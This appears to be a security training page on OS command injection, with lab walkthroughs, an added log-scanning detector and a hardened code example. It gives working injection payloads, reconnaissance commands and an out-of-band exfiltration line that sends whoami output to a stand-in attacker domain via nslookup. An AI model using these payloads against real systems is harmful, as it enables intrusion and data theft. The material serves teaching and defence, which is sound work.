4 OS command injection


In this section, we’ll explain what OS command injection is, describe how vulnerabilities can be detected and exploited, spell out some useful commands and techniques for different operating systems, and summarize how to prevent OS command injection.


I. What is OS command injection?

  1. OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data.
  2. Very often, an attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.

II. Executing arbitrary commands

  1. Consider a shopping application that lets the user view whether an item is in stock in a particular store. This information is accessed via a URL like:
    https://insecure-website.com/stockStatus?productID=381&storeID=29

  2. To provide the stock information, the application must query various legacy systems. For historical reasons, the functionality is implemented by calling out to a shell command with the product and store IDs as arguments:
    stockreport.pl 381 29

  3. This command outputs the stock status for the specified item, which is returned to the user.

  4. Since the application implements no defenses against OS command injection, an attacker can submit the following input to execute an arbitrary command:
    & echo aiwefwlguh &

  5. If this input is submitted in the productID parameter, then the command executed by the application is:
    stockreport.pl & echo aiwefwlguh & 29

  6. The echo command simply causes the supplied string to be echoed in the output, and is a useful way to test for some types of OS command injection. The & character is a shell command separator, and so what gets executed is actually three separate commands one after another. As a result, the output returned to the user is:
    Error - productID was not provided
    aiwefwlguh
    29: command not found

  7. The three lines of output demonstrate that:

  • The original stockreport.pl command was executed without its expected arguments, and so returned an error message.
  • The injected echo command was executed, and the supplied string was echoed in the output.
  • The original argument 29 was executed as a command, which caused an error.

Placing the additional command separator & after the injected command is generally useful because it separates the injected command from whatever follows the injection point. This reduces the likelihood that what follows will prevent the injected command from executing.


Lab: OS command injection, simple case

This lab contains an OS command injection vulnerability in the product stock checker.

The application executes a shell command containing user-supplied product and store IDs, and returns the raw output from the command in its response.

To solve the lab, execute the whoami command to determine the name of the current user.

  1. Use Burp Suite to intercept and modify a request that checks the stock level.
  2. Modify the storeID parameter, giving it the value 1|whoami.
  3. Observe that the response contains the name of the current user.


III. Useful commands

When you have identified an OS command injection vulnerability, it is generally useful to execute some initial commands to obtain information about the system that you have compromised. Below is a summary of some commands that are useful on Linux and Windows platforms:

Purpose of command       Linux         Windows
Name of current user     whoami        whoami
Operating system         uname -a      ver
Network configuration    ifconfig      ipconfig /all
Network connections      netstat -an   netstat -an
Running processes        ps -ef        tasklist

IV. Blind OS command injection vulnerabilities

  1. Many instances of OS command injection are blind vulnerabilities. This means that the application does not return the output from the command within its HTTP response. Blind vulnerabilities can still be exploited, but different techniques are required.

  2. Consider a web site that lets users submit feedback about the site. The user enters their email address and feedback message. The server-side application then generates an email to a site administrator containing the feedback. To do this, it calls out to the mail program with the submitted details. For example:
    mail -s "This site is great" -aFrom:peter@normal-user.net feedback@vulnerable-website.com

  3. The output from the mail command (if any) is not returned in the application’s responses, and so using the echo payload would not be effective. In this situation, you can use a variety of other techniques to detect and exploit a vulnerability.

1. Detecting blind OS command injection using time delays

  1. You can use an injected command that will trigger a time delay, allowing you to confirm that the command was executed based on the time that the application takes to respond. The ping command is an effective way to do this, as it lets you specify the number of ICMP packets to send, and therefore the time taken for the command to run:
    & ping -c 10 127.0.0.1 &
    This command will cause the application to ping its loopback network adapter for 10 seconds.

Lab: Blind OS command injection with time delays

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response.

To solve the lab, exploit the blind OS command injection vulnerability to cause a 10 second delay.

  1. Use Burp Suite to intercept and modify the request that submits feedback.
  2. Modify the email parameter, changing it to: email=x||ping+-c+10+127.0.0.1||
  3. Observe that the response takes 10 seconds to return.


2. Exploiting blind OS command injection by redirecting output

  1. You can redirect the output from the injected command into a file within the web root that you can then retrieve using your browser. For example, if the application serves static resources from the filesystem location /var/www/static, then you can submit the following input:
    & whoami > /var/www/static/whoami.txt &

The > character sends the output from the whoami command to the specified file. You can then use your browser to fetch https://vulnerable-website.com/whoami.txt to retrieve the file, and view the output from the injected command.

Lab: Blind OS command injection with output redirection

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. However, you can use output redirection to capture the output from the command. There is a writable folder at:
/var/www/images/

The application serves the images for the product catalog from this location. You can redirect the output from the injected command to a file in this folder, and then use the image loading URL to retrieve the contents of the file.

To solve the lab, execute the whoami command and retrieve the output.

  1. Use Burp Suite to intercept and modify the request that submits feedback.
  2. Modify the email parameter, changing it to: email=||whoami>/var/www/images/output.txt||
  3. Now use Burp Suite to intercept and modify the request that loads an image of a product.
  4. Modify the filename parameter, changing the value to the name of the file you specified for the output of the injected command: filename=output.txt
  5. Observe that the response contains the output from the injected command.


3. Exploiting blind OS command injection using out-of-band (OAST) techniques

You can use an injected command that will trigger an out-of-band network interaction with a system that you control, using OAST techniques. For example:
& nslookup kgji2ohoyw.web-attacker.com &

This payload uses the nslookup command to cause a DNS lookup for the specified domain. The attacker can monitor for the specified lookup occurring, and thereby detect that the command was successfully injected.

Lab: Blind OS command injection with out-of-band interaction

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator.

To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator’s default public server (burpcollaborator.net).

  1. Use Burp Suite to intercept and modify the request that submits feedback.
  2. Modify the email parameter, changing it to: email=x||nslookup+x.burpcollaborator.net||
  3. Forward + turn off intercept == solved

The out-of-band channel also provides an easy way to exfiltrate the output from injected commands:

& nslookup `whoami`.kgji2ohoyw.web-attacker.com &

This will cause a DNS lookup to the attacker’s domain containing the result of the whoami command:
wwwuser.kgji2ohoyw.web-attacker.com

Lab: Blind OS command injection with out-of-band data exfiltration

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, execute the whoami command and exfiltrate the output via a DNS query to Burp Collaborator. You will need to enter the name of the current user to complete the lab.

  1. Use Burp Suite Professional to intercept and modify the request that submits feedback.
  2. Go to the Burp menu, and launch the Burp Collaborator client.
  3. Click “Copy to clipboard” to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open.
  4. Modify the email parameter, changing it to something like the following, but insert your Burp Collaborator subdomain where indicated: email=||nslookup+`whoami`.YOUR-SUBDOMAIN-HERE.burpcollaborator.net||
  5. Go back to the Burp Collaborator client window, and click "Poll now". You should see some DNS interactions that were initiated by the application as the result of your payload. If you don’t see any interactions listed, wait a few seconds and try again, since the server-side command is executed asynchronously.
  6. Observe that the output from your command appears in the subdomain of the interaction, and you can view this within the Burp Collaborator client. The full domain name that was looked up is shown in the Description tab for the interaction.
  7. To complete the lab, enter the name of the current user.

Note the font.

V. Ways of injecting OS commands

A variety of shell metacharacters can be used to perform OS command injection attacks.

A number of characters function as command separators, allowing commands to be chained together. The following command separators work on both Windows and Unix-based systems:

&
&&
|
||

The following command separators work only on Unix-based systems:

;
Newline (0x0a or \n)

On Unix-based systems, you can also use backticks or the dollar character to perform inline execution of an injected command within the original command:

` injected command `
$( injected command )

Note that the different shell metacharacters have subtly different behaviors that might affect whether they work in certain situations, and whether they allow in-band retrieval of command output or are useful only for blind exploitation.

Sometimes, the input that you control appears within quotation marks in the original command. In this situation, you need to terminate the quoted context (using " or ') before using suitable shell metacharacters to inject a new command.
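The separators listed above are also what a defender looks for in request parameters. The following is an added example, not part of the original page: it URL-decodes each parameter value and flags the metacharacters from this section (plus the > redirect used earlier) across a constructed sample of request lines modelled on the lab payloads. Decoding per parameter matters, because the & that separates query parameters is not an injected separator.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Shell metacharacters from the section above, matched inside a decoded value:
# separators (& && | || ; newline), inline execution (` and $( ) and the >
# redirect used in the output-redirection technique. "||" and "&&" are listed
# before the single-character class so they are reported as one token.
META = re.compile(r"(\|\||&&|\$\(|[;&|`>\n])")


def suspicious_params(query):
    """Return {param: [metacharacters found]} for a raw query/body string.
    Values are decoded with parse_qsl first, so a literal '&' that merely
    separates productID from storeID is never counted as an injection."""
    hits = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        found = META.findall(value)
        if found:
            hits[name] = found
    return hits


# Constructed sample request lines (method, path, optional form body), using
# the same payload shapes the labs above describe. Not real log data.
SAMPLE_LOG = [
    "GET /stockStatus?productID=381&storeID=29",
    "GET /stockStatus?productID=381&storeID=1|whoami",
    "POST /feedback email=x||ping+-c+10+127.0.0.1||",
    "POST /feedback email=%7C%7Cwhoami%3E/var/www/images/output.txt%7C%7C",
    "POST /feedback email=x||nslookup+x.burpcollaborator.net||",
    "POST /feedback email=peter%40normal-user.net&subject=This+site+is+great",
]


def scan(lines):
    """Return [(line, hits)] for every request whose parameters carry
    shell metacharacters; GET parameters come from the query string,
    POST parameters from the form body after the path."""
    flagged = []
    for line in lines:
        method, _, rest = line.partition(" ")
        path, _, body = rest.partition(" ")
        query = urlsplit(path).query if method == "GET" else body
        hits = suspicious_params(query)
        if hits:
            flagged.append((line, hits))
    return flagged
```

A hit is a signal to investigate, not proof of exploitation; a feedback form that legitimately accepts free text will need the rule tuned to the parameters that actually reach a shell.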

VI. How to prevent OS command injection attacks

  1. By far the most effective way to prevent OS command injection vulnerabilities is to never call out to OS commands from application-layer code.

  2. In virtually every case, there are alternate ways of implementing the required functionality using safer platform APIs.

  3. If it is considered unavoidable to call out to OS commands with user-supplied input, then strong input validation must be performed. Some examples of effective validation include:

  • Validating against a whitelist of permitted values.
  • Validating that the input is a number.
  • Validating that the input contains only alphanumeric characters, no other syntax or whitespace.

Never attempt to sanitize input by escaping shell metacharacters. In practice, this is just too error-prone and vulnerable to being bypassed by a skilled attacker.
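To make the advice concrete, here is an added example (not code from the page or from PortSwigger) of the stock checker from section II written the vulnerable way and then the way this section recommends. "echo stock" stands in for stockreport.pl so the code runs anywhere; the hardened version validates that both IDs are numeric and passes them as an argument list rather than a shell string.

```python
import re
import subprocess

# Stand-in for the page's stockreport.pl: the shape of the call is what matters.
STOCKREPORT = "echo stock"


def check_stock_vulnerable(product_id: str, store_id: str) -> str:
    """The pattern from section II: IDs concatenated into one shell string.
    A productID of '& echo aiwefwlguh &' turns the line into three commands."""
    cmd = f"{STOCKREPORT} {product_id} {store_id}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Allowlist from this section: the IDs are numbers, so only digits are accepted.
# No separator, quote, backtick or $( can satisfy this, so nothing is "escaped".
ID_PATTERN = re.compile(r"[0-9]{1,9}")


def is_valid_id(value: str) -> bool:
    return ID_PATTERN.fullmatch(value) is not None


def check_stock_hardened(product_id: str, store_id: str) -> str:
    """Validate first, then invoke the program with an argv list and no shell,
    so the IDs reach it as literal arguments even if validation were weakened."""
    if not (is_valid_id(product_id) and is_valid_id(store_id)):
        raise ValueError("productID and storeID must be numeric")
    argv = ["echo", "stock", product_id, store_id]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # The page's echo payload runs in the vulnerable version and is rejected
    # by the hardened one before any process is started.
    print(check_stock_vulnerable("& echo aiwefwlguh &", "29"))
    print(check_stock_hardened("381", "29"))
```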
